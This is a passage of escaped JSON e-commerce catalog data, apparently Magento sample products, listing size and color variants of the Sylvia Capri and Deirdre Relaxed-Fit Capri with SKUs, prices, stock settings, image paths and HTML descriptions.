\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Green\"},\"1838\":{\"sku\":\"WP11-28-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Sylvia Capri-28-Red\",\"description\":\"<p>Enjoy a sleek, slendering look in new Silvia Capri. Its engineer-designed support fabric feels great and gives the illusion of a slimmer fit.<\\/p>\\n<p>&bull; Green striped capri.<br \\/>&bull; Strategic side seam<br \\/>&bull; Comfort gusset with lining.<br \\/>&bull; Flat seaming.<br \\/>&bull; Wide waistband.<br \\/>&bull; Moisture wicking.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sylvia-capri-28-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Red\"},\"1839\":{\"sku\":\"WP11-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Sylvia Capri-29-Blue\",\"description\":\"<p>Enjoy a sleek, slendering look in new Silvia Capri. Its engineer-designed support fabric feels great and gives the illusion of a slimmer fit.<\\/p>\\n<p>&bull; Green striped capri.<br \\/>&bull; Strategic side seam<br \\/>&bull; Comfort gusset with lining.<br \\/>&bull; Flat seaming.<br \\/>&bull; Wide waistband.<br \\/>&bull; Moisture wicking.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sylvia-capri-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1840\":{\"sku\":\"WP11-29-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Sylvia Capri-29-Green\",\"description\":\"<p>Enjoy a sleek, slendering look in new Silvia Capri. Its engineer-designed support fabric feels great and gives the illusion of a slimmer fit.<\\/p>\\n<p>&bull; Green striped capri.<br \\/>&bull; Strategic side seam<br \\/>&bull; Comfort gusset with lining.<br \\/>&bull; Flat seaming.<br \\/>&bull; Wide waistband.<br \\/>&bull; Moisture wicking.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sylvia-capri-29-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp11-green_back.jpg\",\"image\":\"\\/w\\/p\\/wp11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp11-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Green\"},\"1841\":{\"sku\":\"WP11-29-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Sylvia Capri-29-Red\",\"description\":\"<p>Enjoy a sleek, slendering look in new Silvia Capri. Its engineer-designed support fabric feels great and gives the illusion of a slimmer fit.<\\/p>\\n<p>&bull; Green striped capri.<br \\/>&bull; Strategic side seam<br \\/>&bull; Comfort gusset with lining.<br \\/>&bull; Flat seaming.<br \\/>&bull; Wide waistband.<br \\/>&bull; Moisture wicking.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sylvia-capri-29-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Red\"},\"1842\":{\"sku\":\"WP11\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Sylvia Capri\",\"description\":\"<p>Enjoy a sleek, slendering look in new Silvia Capri. Its engineer-designed support fabric feels great and gives the illusion of a slimmer fit.<\\/p>\\n<p>&bull; Green striped capri.<br \\/>&bull; Strategic side seam<br \\/>&bull; Comfort gusset with lining.<br \\/>&bull; Flat seaming.<br \\/>&bull; Wide waistband.<br \\/>&bull; Moisture wicking.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Capri,material=Lycra&reg;|Organic Cotton|Polyester,pattern=Striped,climate=Indoor,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP11-28-Blue,size=28,color=Blue|sku=WP11-28-Green,size=28,color=Green|sku=WP11-28-Red,size=28,color=Red|sku=WP11-29-Blue,size=29,color=Blue|sku=WP11-29-Green,size=29,color=Green|sku=WP11-29-Red,size=29,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp11-green_back.jpg\",\"image\":\"\\/w\\/p\\/wp11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp11-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Capri\",\"material\":\"Lycra&reg;|Organic Cotton|Polyester\",\"pattern\":\"Striped\",\"climate\":\"Indoor\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1843\":{\"sku\":\"WP12-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Deirdre Relaxed-Fit Capri-28-Blue\",\"description\":\"<p>Invigorate your yoga practice with this Deirdre Relaxed-Fit Capri, designed to let you move without strain or restriction.<\\/p>\\n<p>&bull; Heather gray capris with mint green waist &amp; accents.<br \\/>&bull; Comfortable, relaxed fit with high rise.<br \\/>&bull; Moisture-wicking, 4-way stretch construction.<br \\/>&bull; Lined with mesh for better support.<br \\/>&bull; Hidden pocket at waistband.<br \\/>&bull; Flatlock seams and lined gusset for comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deirdre-relaxed-fit-capri-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1844\":{\"sku\":\"WP12-28-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Deirdre Relaxed-Fit Capri-28-Gray\",\"description\":\"<p>Invigorate your yoga practice with this Deirdre Relaxed-Fit Capri, designed to let you move without strain or restriction.<\\/p>\\n<p>&bull; Heather gray capris with mint green waist &amp; accents.<br \\/>&bull; Comfortable, relaxed fit with high rise.<br \\/>&bull; Moisture-wicking, 4-way stretch construction.<br \\/>&bull; Lined with mesh for better support.<br \\/>&bull; Hidden pocket at waistband.<br \\/>&bull; Flatlock seams and lined gusset for comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deirdre-relaxed-fit-capri-28-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp12-gray_back.jpg\",\"image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp12-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Gray\"},\"1845\":{\"sku\":\"WP12-28-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Deirdre Relaxed-Fit Capri-28-Green\",\"description\":\"<p>Invigorate your yoga practice with this Deirdre Relaxed-Fit Capri, designed to let you move without strain or restriction.<\\/p>\\n<p>&bull; Heather gray capris with mint green waist &amp; accents.<br \\/>&bull; Comfortable, relaxed fit with high rise.<br \\/>&bull; Moisture-wicking, 4-way stretch construction.<br \\/>&bull; Lined with mesh for better support.<br \\/>&bull; Hidden pocket at waistband.<br \\/>&bull; Flatlock seams and lined gusset for comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deirdre-relaxed-fit-capri-28-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Green\"},\"1846\":{\"sku\":\"WP12-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Deirdre Relaxed-Fit Capri-29-Blue\",\"description\":\"<p>Invigorate your yoga practice with this Deirdre Relaxed-Fit Capri, designed to let you move without strain or restriction.<\\/p>\\n<p>&bull; Heather gray capris with mint green waist &amp; accents.<br \\/>&bull; Comfortable, relaxed fit with high rise.<br \\/>&bull; Moisture-wicking, 4-way stretch construction.<br \\/>&bull; Lined with mesh for better support.<br \\/>&bull; Hidden pocket at waistband.<br \\/>&bull; Flatlock seams and lined gusset for comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deirdre-relaxed-fit-capri-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\